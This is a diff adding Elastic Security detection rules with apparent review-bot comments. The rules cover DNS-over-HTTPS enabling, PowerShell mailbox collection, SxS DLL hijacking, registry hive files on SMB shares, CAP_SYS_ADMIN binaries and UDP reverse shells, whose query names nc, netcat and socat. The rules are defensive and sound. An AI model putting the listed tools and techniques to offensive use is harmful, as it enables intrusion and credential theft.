a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_109.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_109.json new file mode 100644 index 00000000000..dcd33793733 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_109.json 
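Review bot: Operator precedence in `query` leaves the Chrome and Firefox branches unconstrained: EQL binds `and` tighter than `or`, so `host.os.type == "windows" and event.type in ("creation", "change")` applies only to the Edge `BuiltInDnsClientEnabled` clause, while the `DnsOverHttpsMode` and `DNSOverHTTPS` clauses match registry events of any type and OS. Wrapping the three path/value pairs in one group fixes it: `registry where host.os.type == "windows" and event.type in ("creation", "change") and (` followed by the three `or`-joined clauses and a closing `)`. The same query is shipped unchanged in the `_109` revision of this rule (`a22a09c2-2162-4df0-a356-9aacbeb56a04_109.json`) added later in this commit, so both files need the fix.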
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "DNS-over-HTTPS Enabled via Registry", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled\" and\n registry.data.strings : \"1\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode\" and\n registry.data.strings : \"secure\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\" and\n registry.data.strings : \"1\")\n", + "references": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define 
`event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "a22a09c2-2162-4df0-a356-9aacbeb56a04_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_7.json b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_7.json new file mode 100644 index 00000000000..a11962b556e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a2d04374-187c-4fd9-b513-3ad4e7fdd67a_7.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can be used to collect data from mailboxes. Adversaries may target user email to collect sensitive information.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Mailbox Collection Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell Mailbox Collection Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nEmail mailboxes and their information can be valuable assets for attackers. Company mailboxes often contain sensitive information such as login credentials, intellectual property, financial data, and personal information, making them high-value targets for malicious actors.\n\nThis rule identifies scripts that contains methods and classes that can be abused to collect emails from local and remote mailboxes.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n - Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Related rules\n\n- Exporting Exchange Mailbox via PowerShell - 6aace640-e631-4870-ba8e-5fdda09325db\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n (\n powershell.file.script_block_text : (\n \"Microsoft.Office.Interop.Outlook\" or\n \"Interop.Outlook.olDefaultFolders\" or\n \"::olFolderInBox\"\n ) or\n powershell.file.script_block_text : (\n \"Microsoft.Exchange.WebServices.Data.Folder\" or\n \"Microsoft.Exchange.WebServices.Data.FileAttachment\"\n )\n ) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/apt29/Archive/CALDERA_DIY/evals/payloads/stepSeventeen_email.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v 
EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.001", + "name": "Local Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/001/" + }, + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 7 + }, + "id": "a2d04374-187c-4fd9-b513-3ad4e7fdd67a_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_107.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_107.json new file mode 100644 index 00000000000..648878be1ca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_107.json 
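Review bot: The `not user.id : "S-1-5-18"` exclusion in `query` is not explained anywhere in `note`; the false positive analysis should say why script blocks running as Local System are dropped (presumably to suppress management-agent automation) so analysts understand the coverage boundary, e.g. `- Script blocks executed as Local System (S-1-5-18) are excluded to reduce noise from system-managed automation.` The `note` also has a grammar slip in "This rule identifies scripts that contains methods and classes", which should read `scripts that contain`.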
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation, change, or deletion of a DLL module within a Windows SxS local folder. Adversaries may abuse shared modules to execute malicious payloads by instructing the Windows module loader to load DLLs from arbitrary local paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via local SxS Shared Module", + "note": "## Triage and analysis\n\nThe SxS DotLocal folder is a legitimate feature that can be abused to hijack standard modules loading order by forcing an executable on the same application.exe.local folder to load a malicious DLL module from the same directory.\n", + "query": "file where host.os.type == \"windows\" and file.extension : \"dll\" and file.path : \"C:\\\\*\\\\*.exe.local\\\\*.dll\"\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1129", + "name": "Shared Modules", + "reference": "https://attack.mitre.org/techniques/T1129/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_108.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_108.json new file mode 100644 index 00000000000..6f09931215e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_108.json 
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation, change, or deletion of a DLL module within a Windows SxS local folder. Adversaries may abuse shared modules to execute malicious payloads by instructing the Windows module loader to load DLLs from arbitrary local paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via local SxS Shared Module", + "note": "## Triage and analysis\n\nThe SxS DotLocal folder is a legitimate feature that can be abused to hijack standard modules loading order by forcing an executable on the same application.exe.local folder to load a malicious DLL module from the same directory.\n", + "query": "file where host.os.type == \"windows\" and file.extension : \"dll\" and file.path : \"C:\\\\*\\\\*.exe.local\\\\*.dll\"\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1129", + "name": "Shared Modules", + "reference": "https://attack.mitre.org/techniques/T1129/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_108.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_108.json new file mode 100644 index 00000000000..11c88ea46e4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_108.json 
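Review bot: The query's path filter `file.path : "C:\\\\*\\\\*.exe.local\\\\*.dll"` is anchored to the C: drive, so a `.exe.local` redirection folder next to an executable on any other volume is never matched, while the other rules in this change (for example the SMB-share rule's exclusions) use the `?:\\\\` drive wildcard. Changing the leading `C:` to `?:` in the query string keeps the rest of the pattern intact and covers every fixed drive; the same query appears unchanged in the version 107 file, so the fix belongs in whichever version is kept. The description promises creation, change and deletion and the query has no `event.type` filter, so that part is consistent and needs no change.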
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a medium-size registry hive file on a Server Message Block (SMB) share, which may indicate an exfiltration attempt of a previously dumped Security Account Manager (SAM) registry hive for credential extraction on an attacker-controlled system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Registry File Creation in SMB Share", + "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. 
Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\") and\n not file.path : (\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT\",\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT.LASTGOOD.LOAD\",\n \"?:\\\\Windows\\\\Netwrix\\\\Temp\\\\????????.???.offreg\",\n \"?:\\\\*\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.*\\\\Settings\\\\settings.dat*\"\n )\n", + "references": [ + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": 
"file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_108", + "type": "security-rule" +} \ No newline at end of file 
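Review bot: The description and the triage note both say the rule fires on "creation or modification" of a hive file on the share, but the query restricts to `event.type == "creation"`, so a hive written over an existing file name on the share produces a change event that this rule does not see. Either widen the condition to `event.type in ("creation", "change")` — the `72656766*` header check, the 30000-byte size floor and `process.pid == 4` still bound the noise — or drop "or modification" from the description so the documented scope matches what is detected. This rule also has no `setup` section, unlike the other rules in this change that carry one; if Elastic Defend file events need no extra configuration, a one-line setup note saying so would avoid the question.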
diff --git a/packages/security_detection_engine/kibana/security_rule/a577e524-c2ee-47bd-9c5b-e917d01d3276_2.json b/packages/security_detection_engine/kibana/security_rule/a577e524-c2ee-47bd-9c5b-e917d01d3276_2.json new file mode 100644 index 00000000000..86defd7fae5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a577e524-c2ee-47bd-9c5b-e917d01d3276_2.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies instances where a binary is granted the CAP_SYS_ADMIN capability. In Linux, the CAP_SYS_ADMIN capability is a powerful and broad capability that allows a process to perform a range of system administration operations, such as mounting and unmounting filesystems, configuring network interfaces, and accessing hardware devices. Attackers may leverage a misconfiguration for exploitation in order to escalate their privileges to root. The rule identifies previously unknown processes executing with CAP_SYS_ADMIN capabilities through the use of the new terms rule type.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "CAP_SYS_ADMIN Assigned to Binary", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "event.category:\"process\" and host.os.type:\"linux\" and event.type:\"start\" and event.action:\"exec\" and process.name:* and\n(process.thread.capabilities.effective:\"CAP_SYS_ADMIN\" or process.thread.capabilities.permitted:\"CAP_SYS_ADMIN\") and\nnot user.id:\"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + 
"risk_score": 21, + "rule_id": "a577e524-c2ee-47bd-9c5b-e917d01d3276", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "a577e524-c2ee-47bd-9c5b-e917d01d3276_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_5.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_5.json new file mode 100644 index 00000000000..b2ccd077e40 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_5.json 
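Review bot: The threat mapping at the end of the hunk carries only TA0003 Persistence with an empty `technique` array, while the description says the attacker's goal is to "escalate their privileges to root" via CAP_SYS_ADMIN, so the ATT&CK context and the text disagree. A Privilege Escalation (TA0004) entry seems the closer fit — presumably T1548 Abuse Elevation Control Mechanism, to be confirmed against the team's mapping conventions — and the `Tactic: Persistence` tag should follow whichever tactic is chosen. The query itself (`CAP_SYS_ADMIN` in effective or permitted capabilities, `not user.id:"0"`, new terms on host/user/executable) reads as intended and is not affected.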
@@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via UDP", + "query": "sample by host.id, process.pid, process.parent.pid\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"execve\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n )\n ]\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"socket\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and\n auditd.data.a0 == \"2\" and auditd.data.a1 : (\"2\", \"802\")]\n[network where host.os.type == \"linux\" and auditd.data.syscall == \"connect\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and\n network.direction == \"egress\" and destination.ip != null and destination.ip != \"127.0.0.1\" and\n destination.ip != \"127.0.0.53\" and destination.ip != \"::1\"]\n", + 
"references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a1", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, 